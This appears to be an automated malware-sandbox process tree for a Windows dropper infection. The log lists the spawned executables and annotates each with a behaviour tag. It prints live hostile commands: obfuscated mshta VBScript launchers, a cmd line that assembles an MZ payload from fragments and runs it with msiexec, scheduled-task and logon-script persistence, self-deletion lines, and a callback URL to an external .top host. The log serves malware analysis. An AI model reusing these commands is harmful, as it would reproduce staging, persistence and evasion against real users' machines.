[depth 9] C:\Users\Admin\AppData\Roaming\668961.exe
  "C:\Users\Admin\AppData\Roaming\668961.exe"
[depth 9] C:\Users\Admin\AppData\Roaming\7590801.exe
  "C:\Users\Admin\AppData\Roaming\7590801.exe"
  - Checks computer location settings
  - Suspicious behavior: SetClipboardViewer
[depth 9] C:\Users\Admin\AppData\Roaming\8061326.exe
  "C:\Users\Admin\AppData\Roaming\8061326.exe"
[depth 7] C:\Windows\SysWOW64\schtasks.exe
  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
  - Creates scheduled task(s)
[depth 7] C:\Windows\SysWOW64\schtasks.exe
  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
  - Creates scheduled task(s)
[depth 6] C:\Users\Admin\Pictures\Adobe Films\VcbaY0rxppQvxsF6Dhkdg4_f.exe
  "C:\Users\Admin\Pictures\Adobe Films\VcbaY0rxppQvxsF6Dhkdg4_f.exe"
  - Executes dropped EXE
[depth 6] C:\Users\Admin\Pictures\Adobe Films\oNHOyUQ3HKSKoT6WvbTWcZUk.exe
  "C:\Users\Admin\Pictures\Adobe Films\oNHOyUQ3HKSKoT6WvbTWcZUk.exe"
  - Executes dropped EXE
[depth 6] C:\Users\Admin\Pictures\Adobe Films\Dg_Ebh8ihIYC1JCfpRAyNWiT.exe
  "C:\Users\Admin\Pictures\Adobe Films\Dg_Ebh8ihIYC1JCfpRAyNWiT.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
[depth 6] C:\Users\Admin\Pictures\Adobe Films\R9JjaNeErim9RBtGd3_3uQhr.exe
  "C:\Users\Admin\Pictures\Adobe Films\R9JjaNeErim9RBtGd3_3uQhr.exe"
[depth 7] C:\Users\Admin\Pictures\Adobe Films\R9JjaNeErim9RBtGd3_3uQhr.exe
  "C:\Users\Admin\Pictures\Adobe Films\R9JjaNeErim9RBtGd3_3uQhr.exe"
[depth 6] C:\Users\Admin\Pictures\Adobe Films\PpRYTY3XAHm45YE_1aQu6ef5.exe
  "C:\Users\Admin\Pictures\Adobe Films\PpRYTY3XAHm45YE_1aQu6ef5.exe"
[depth 7] C:\Users\Admin\AppData\Local\Temp\build.exe
  "C:\Users\Admin\AppData\Local\Temp\build.exe"
  - Suspicious use of SetWindowsHookEx
[depth 6] C:\Users\Admin\Pictures\Adobe Films\pkEHV3QnxJNQawwSUY_T9v6l.exe
  "C:\Users\Admin\Pictures\Adobe Films\pkEHV3QnxJNQawwSUY_T9v6l.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
[depth 7] C:\Users\Admin\Pictures\Adobe Films\pkEHV3QnxJNQawwSUY_T9v6l.exe
  "C:\Users\Admin\Pictures\Adobe Films\pkEHV3QnxJNQawwSUY_T9v6l.exe"
[depth 6] C:\Users\Admin\Pictures\Adobe Films\sDpSUCcF7crBKFAL0nlkdsFL.exe
  "C:\Users\Admin\Pictures\Adobe Films\sDpSUCcF7crBKFAL0nlkdsFL.exe"
  - Executes dropped EXE
[depth 7] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5728 -s 656
  - Program crash
[depth 7] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5728 -s 672
  - Program crash
[depth 7] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5728 -s 628
  - Program crash
[depth 7] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5728 -s 652
  - Program crash
[depth 6] C:\Users\Admin\Pictures\Adobe Films\BeNlWgh16GLAdiYLOwOe1lqZ.exe
  "C:\Users\Admin\Pictures\Adobe Films\BeNlWgh16GLAdiYLOwOe1lqZ.exe"
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
[depth 7] C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
  "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
[depth 7] C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
  - Checks whether UAC is enabled
[depth 7] C:\Program Files (x86)\Company\NewProduct\inst3.exe
  "C:\Program Files (x86)\Company\NewProduct\inst3.exe"
  - Suspicious use of SetWindowsHookEx
[depth 7] C:\Program Files (x86)\Company\NewProduct\cutm3.exe
  "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
  - Suspicious use of SetWindowsHookEx
[depth 6] C:\Users\Admin\Pictures\Adobe Films\ghyLwzsW68yJrRDdcOnQsReb.exe
  "C:\Users\Admin\Pictures\Adobe Films\ghyLwzsW68yJrRDdcOnQsReb.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
[depth 7] C:\Users\Admin\Pictures\Adobe Films\ghyLwzsW68yJrRDdcOnQsReb.exe
  "C:\Users\Admin\Pictures\Adobe Films\ghyLwzsW68yJrRDdcOnQsReb.exe"
[depth 6] C:\Users\Admin\Pictures\Adobe Films\1luUodQBKunwgCepAZE5m_rN.exe
  "C:\Users\Admin\Pictures\Adobe Films\1luUodQBKunwgCepAZE5m_rN.exe"
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
[depth 6] C:\Users\Admin\Pictures\Adobe Films\B_jeA9OMEfd0MmBnOrj56I2B.exe
  "C:\Users\Admin\Pictures\Adobe Films\B_jeA9OMEfd0MmBnOrj56I2B.exe"
  - Executes dropped EXE
[depth 6] C:\Users\Admin\Pictures\Adobe Films\Knv5tLGcITqzriOiFtbYIHkp.exe
  "C:\Users\Admin\Pictures\Adobe Films\Knv5tLGcITqzriOiFtbYIHkp.exe"
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
[depth 6] C:\Users\Admin\Pictures\Adobe Films\6PzDKqTumYc6wQmCZmE1EFMz.exe
  "C:\Users\Admin\Pictures\Adobe Films\6PzDKqTumYc6wQmCZmE1EFMz.exe"
[depth 7] C:\Users\Admin\Pictures\Adobe Films\6PzDKqTumYc6wQmCZmE1EFMz.exe
  "C:\Users\Admin\Pictures\Adobe Films\6PzDKqTumYc6wQmCZmE1EFMz.exe"
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
[depth 6] C:\Users\Admin\Pictures\Adobe Films\sgW4jGtWxhxeWNFGti7lxHAb.exe
  "C:\Users\Admin\Pictures\Adobe Films\sgW4jGtWxhxeWNFGti7lxHAb.exe"
[depth 6] C:\Users\Admin\Pictures\Adobe Films\xZo5SkZvBjjKerb8WgYJbhvy.exe
  "C:\Users\Admin\Pictures\Adobe Films\xZo5SkZvBjjKerb8WgYJbhvy.exe"
[depth 6] C:\Users\Admin\Pictures\Adobe Films\Ed_zx0pAemCqxcN5I9SQkaTQ.exe
  "C:\Users\Admin\Pictures\Adobe Films\Ed_zx0pAemCqxcN5I9SQkaTQ.exe"
[depth 6] C:\Users\Admin\Pictures\Adobe Films\0RUQ6M4hEj5uKszGSI2ZUJVQ.exe
  "C:\Users\Admin\Pictures\Adobe Films\0RUQ6M4hEj5uKszGSI2ZUJVQ.exe"
[depth 7] C:\Users\Admin\AppData\Roaming\424779.exe
  "C:\Users\Admin\AppData\Roaming\424779.exe"
[depth 7] C:\Users\Admin\AppData\Roaming\2974229.exe
  "C:\Users\Admin\AppData\Roaming\2974229.exe"
[depth 7] C:\Users\Admin\AppData\Roaming\6199182.exe
  "C:\Users\Admin\AppData\Roaming\6199182.exe"
  - Suspicious use of SetThreadContext
[depth 8] C:\Users\Admin\AppData\Roaming\6199182.exe
  "C:\Users\Admin\AppData\Roaming\6199182.exe"
[depth 8] C:\Users\Admin\AppData\Roaming\6199182.exe
  "C:\Users\Admin\AppData\Roaming\6199182.exe"
  - Suspicious use of SetWindowsHookEx
[depth 7] C:\Users\Admin\AppData\Roaming\6670411.exe
  "C:\Users\Admin\AppData\Roaming\6670411.exe"
  - Suspicious behavior: SetClipboardViewer
[depth 7] C:\Users\Admin\AppData\Roaming\5669991.exe
  "C:\Users\Admin\AppData\Roaming\5669991.exe"
[depth 8] C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  - Executes dropped EXE
[depth 6] C:\Users\Admin\Pictures\Adobe Films\dBfLigPnGbkVroMLScuPczOh.exe
  "C:\Users\Admin\Pictures\Adobe Films\dBfLigPnGbkVroMLScuPczOh.exe"
  - Suspicious use of SetWindowsHookEx
[depth 7] C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\dBfLigPnGbkVroMLScuPczOh.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\dBfLigPnGbkVroMLScuPczOh.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
[depth 8] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\dBfLigPnGbkVroMLScuPczOh.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\dBfLigPnGbkVroMLScuPczOh.exe" ) do taskkill -im "%~NxK" -F
[depth 9] C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
  8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
[depth 10] C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
[depth 11] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
[depth 10] C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )
[depth 11] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl+ _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
[depth 12] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" EcHO "
[depth 12] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
[depth 12] C:\Windows\SysWOW64\msiexec.exe
  msiexec.exe -y .\N3V4H8H.SXY
  - Loads dropped DLL
[depth 9] C:\Windows\SysWOW64\taskkill.exe
  taskkill -im "dBfLigPnGbkVroMLScuPczOh.exe" -F
  - Kills process with taskkill
[depth 6] C:\Users\Admin\Pictures\Adobe Films\GKWt8jAAi7IwCqNCN3FGm_q4.exe
  "C:\Users\Admin\Pictures\Adobe Films\GKWt8jAAi7IwCqNCN3FGm_q4.exe"
  - Suspicious use of SetWindowsHookEx
[depth 7] C:\Users\Admin\AppData\Local\Temp\is-P6LVD.tmp\GKWt8jAAi7IwCqNCN3FGm_q4.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-P6LVD.tmp\GKWt8jAAi7IwCqNCN3FGm_q4.tmp" /SL5="$A020E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\GKWt8jAAi7IwCqNCN3FGm_q4.exe"
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx
[depth 8] C:\Users\Admin\AppData\Local\Temp\is-ERKL2.tmp\DYbALA.exe
  "C:\Users\Admin\AppData\Local\Temp\is-ERKL2.tmp\DYbALA.exe" /S /UID=2710
  - Drops file in Drivers directory
  - Adds Run key to start application
  - Drops file in Program Files directory
[depth 9] C:\Program Files\Microsoft Office 15\JUKBWVWKYK\foldershare.exe
  "C:\Program Files\Microsoft Office 15\JUKBWVWKYK\foldershare.exe" /VERYSILENT
[depth 9] C:\Users\Admin\AppData\Local\Temp\3c-48672-d37-23cb2-06ffaa0ba00ec\Qidymacano.exe
  "C:\Users\Admin\AppData\Local\Temp\3c-48672-d37-23cb2-06ffaa0ba00ec\Qidymacano.exe"
  - Checks computer location settings
[depth 10] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
  dw20.exe -x -s 2480
[depth 9] C:\Users\Admin\AppData\Local\Temp\dd-cffa8-5f2-654bb-972bad5daeef7\Decylyvala.exe
  "C:\Users\Admin\AppData\Local\Temp\dd-cffa8-5f2-654bb-972bad5daeef7\Decylyvala.exe"
[depth 10] C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lla1u2ef.ypc\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit
[depth 11] C:\Users\Admin\AppData\Local\Temp\lla1u2ef.ypc\setting.exe
  C:\Users\Admin\AppData\Local\Temp\lla1u2ef.ypc\setting.exe SID=778 CID=778 SILENT=1 /quiet
  - Loads dropped DLL
  - Enumerates connected drives
  - Suspicious use of FindShellTrayWindow
[depth 12] C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\lla1u2ef.ypc\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\lla1u2ef.ypc\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634846932 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"
[depth 10] C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l4pqr4ya.23e\GcleanerEU.exe /eufive & exit
[depth 11] C:\Users\Admin\AppData\Local\Temp\l4pqr4ya.23e\GcleanerEU.exe
  C:\Users\Admin\AppData\Local\Temp\l4pqr4ya.23e\GcleanerEU.exe /eufive
[depth 12] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 648
  - Program crash
[depth 12] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 664
  - Program crash
[depth 12] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 668
  - Program crash
[depth 12] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 656
  - Program crash
[depth 12] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 904
  - Program crash
[depth 10] C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b1vudadb.135\installer.exe /qn CAMPAIGN="654" & exit
[depth 11] C:\Users\Admin\AppData\Local\Temp\b1vudadb.135\installer.exe
  C:\Users\Admin\AppData\Local\Temp\b1vudadb.135\installer.exe /qn CAMPAIGN="654"
  - Loads dropped DLL
  - Enumerates connected drives
  - Suspicious use of FindShellTrayWindow
[depth 12] C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\b1vudadb.135\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\b1vudadb.135\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634846932 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
[depth 10] C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lwr1seqa.zxq\any.exe & exit
[depth 11] C:\Users\Admin\AppData\Local\Temp\lwr1seqa.zxq\any.exe
  C:\Users\Admin\AppData\Local\Temp\lwr1seqa.zxq\any.exe
  - Suspicious use of SetWindowsHookEx
[depth 10] C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ds30d3g1.w5s\customer51.exe & exit
[depth 11] C:\Users\Admin\AppData\Local\Temp\ds30d3g1.w5s\customer51.exe
  C:\Users\Admin\AppData\Local\Temp\ds30d3g1.w5s\customer51.exe
  - Suspicious use of SetWindowsHookEx
[depth 10] C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vt3v30hp.wkn\gcleaner.exe /mixfive & exit
[depth 11] C:\Users\Admin\AppData\Local\Temp\vt3v30hp.wkn\gcleaner.exe
  C:\Users\Admin\AppData\Local\Temp\vt3v30hp.wkn\gcleaner.exe /mixfive
[depth 12] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 8448 -s 648
  - Program crash
[depth 12] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 8448 -s 664
  - Program crash
[depth 12] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 8448 -s 620
  - Program crash
[depth 12] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 8448 -s 644
  - Program crash
[depth 12] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 8448 -s 900
  - Program crash
[depth 12] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 8448 -s 972
  - Program crash
[depth 12] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 8448 -s 1084
  - Program crash
[depth 10] C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0mums1cj.my2\FastPC.exe /verysilent & exit
[depth 11] C:\Users\Admin\AppData\Local\Temp\0mums1cj.my2\FastPC.exe
  C:\Users\Admin\AppData\Local\Temp\0mums1cj.my2\FastPC.exe /verysilent
  - Checks processor information in registry
  - Suspicious use of SetWindowsHookEx
[depth 12] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im FastPC.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\0mums1cj.my2\FastPC.exe" & del C:\ProgramData\*.dll & exit
  - Blocklisted process makes network request
[depth 13] C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[depth 13] C:\Windows\SysWOW64\taskkill.exe
  taskkill /im FastPC.exe /f
  - Kills process with taskkill
[depth 13] C:\Windows\SysWOW64\timeout.exe
  timeout /t 6
  - Delays execution with timeout.exe
[depth 10] C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\euwd4bfg.wch\FastPC.exe /verysilent & exit
[depth 11] C:\Users\Admin\AppData\Local\Temp\euwd4bfg.wch\FastPC.exe
  C:\Users\Admin\AppData\Local\Temp\euwd4bfg.wch\FastPC.exe /verysilent
  - Suspicious use of SetWindowsHookEx
[depth 12] C:\Users\Admin\AppData\Local\Temp\is-JJBOG.tmp\FastPC.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-JJBOG.tmp\FastPC.tmp" /SL5="$10788,138429,56832,C:\Users\Admin\AppData\Local\Temp\euwd4bfg.wch\FastPC.exe" /verysilent
[depth 13] C:\Users\Admin\AppData\Local\Temp\is-NOFPU.tmp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\is-NOFPU.tmp\Setup.exe" /Verysilent
[depth 14] C:\Program Files (x86)\FastPc\FastPc\Fast_.exe
  "C:\Program Files (x86)\FastPc\FastPc\Fast_.exe"
[depth 14] C:\Program Files (x86)\FastPc\FastPc\13.exe
  "C:\Program Files (x86)\FastPc\FastPc\13.exe"
[depth 15] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe"
[depth 16] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe"
[depth 16] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe"
[depth 16] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe"
[depth 16] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe"
[depth 16] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe"
  - Blocklisted process makes network request
  - Drops file in Windows directory
  - Modifies system certificate store
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious behavior: SetClipboardViewer
[depth 14] C:\Program Files (x86)\FastPc\FastPc\Fast.exe
  "C:\Program Files (x86)\FastPc\FastPc\Fast.exe"
[depth 15] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im Fast.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\FastPc\FastPc\Fast.exe" & del C:\ProgramData\*.dll & exit
[depth 16] C:\Windows\SysWOW64\taskkill.exe
  taskkill /im Fast.exe /f
  - Kills process with taskkill
[depth 16] C:\Windows\SysWOW64\timeout.exe
  timeout /t 6
  - Delays execution with timeout.exe
[depth 14] C:\Program Files (x86)\FastPc\FastPc\Faster.exe
  "C:\Program Files (x86)\FastPc\FastPc\Faster.exe"
  - Checks computer location settings
[depth 15] C:\Users\Admin\AppData\Local\Temp\installer.exe
  "C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"
[depth 15] C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe
  "C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
[depth 16] C:\Users\Admin\AppData\Local\Temp\is-HDI7T.tmp\IBInstaller_74449.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-HDI7T.tmp\IBInstaller_74449.tmp" /SL5="$20444,17037196,721408,C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
[depth 17] C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-0B3JR.tmp\{app}\microsoft.cab -F:* %ProgramData%
[depth 18] C:\Windows\SysWOW64\expand.exe
  expand C:\Users\Admin\AppData\Local\Temp\is-0B3JR.tmp\{app}\microsoft.cab -F:* C:\ProgramData
  - Drops file in Windows directory
[depth 17] C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
[depth 18] C:\Windows\SysWOW64\reg.exe
  reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
[depth 17] C:\Users\Admin\AppData\Local\Temp\is-0B3JR.tmp\{app}\vdi_compiler.exe
  "C:\Users\Admin\AppData\Local\Temp\is-0B3JR.tmp\{app}\vdi_compiler"
[depth 18] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-0B3JR.tmp\{app}\vdi_compiler.exe"
[depth 19] C:\Windows\SysWOW64\PING.EXE
  ping 127.0.0.1 -n 4
  - Runs ping.exe
[depth 17] C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c start http://coeplorfd234.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
  - Checks computer location settings
[depth 17] C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
  "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
[depth 15] C:\Users\Admin\AppData\Local\Temp\vpn.exe
  "C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=720
[depth 16] C:\Users\Admin\AppData\Local\Temp\is-C17D6.tmp\vpn.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-C17D6.tmp\vpn.tmp" /SL5="$40444,15170975,270336,C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=720
  - Drops file in Program Files directory
  - Checks processor information in registry
  - Modifies system certificate store
[depth 17] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
[depth 18] C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
  tapinstall.exe remove tap0901
  - Checks SCSI registry key(s)
[depth 17] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
[depth 18] C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
  tapinstall.exe install OemVista.inf tap0901
[depth 17] C:\Program Files (x86)\MaskVPN\mask_svc.exe
  "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
  - Suspicious use of NtSetInformationThreadHideFromDebugger
[depth 17] C:\Program Files (x86)\MaskVPN\mask_svc.exe
  "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
  - Suspicious use of NtSetInformationThreadHideFromDebugger
[depth 15] C:\Users\Admin\AppData\Local\Temp\Settings Installation.exe
  "C:\Users\Admin\AppData\Local\Temp\Settings Installation.exe" SID=775 SID CID=775 SILENT=1 /quiet
[depth 15] C:\Users\Admin\AppData\Local\Temp\note866.exe
  "C:\Users\Admin\AppData\Local\Temp\note866.exe"
  - Checks whether UAC is enabled
[depth 15] C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Program Files (x86)\FastPc\FastPc\Faster.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Program Files (x86)\FastPc\FastPc\Faster.exe"
[depth 16] C:\Windows\system32\PING.EXE
  ping 1.1.1.1 -n 1 -w 100
  - Runs ping.exe
[depth 16] C:\Windows\system32\PING.EXE
  ping 1.1.1.1 -n 1 -w 900
  - Runs ping.exe
[depth 10] C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mly1oa4h.0yp\autosubplayer.exe /S & exit
[depth 11] C:\Users\Admin\AppData\Local\Temp\mly1oa4h.0yp\autosubplayer.exe
  C:\Users\Admin\AppData\Local\Temp\mly1oa4h.0yp\autosubplayer.exe /S
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"
[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"
[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"
[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"
  - Suspicious use of SetWindowsHookEx
[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"
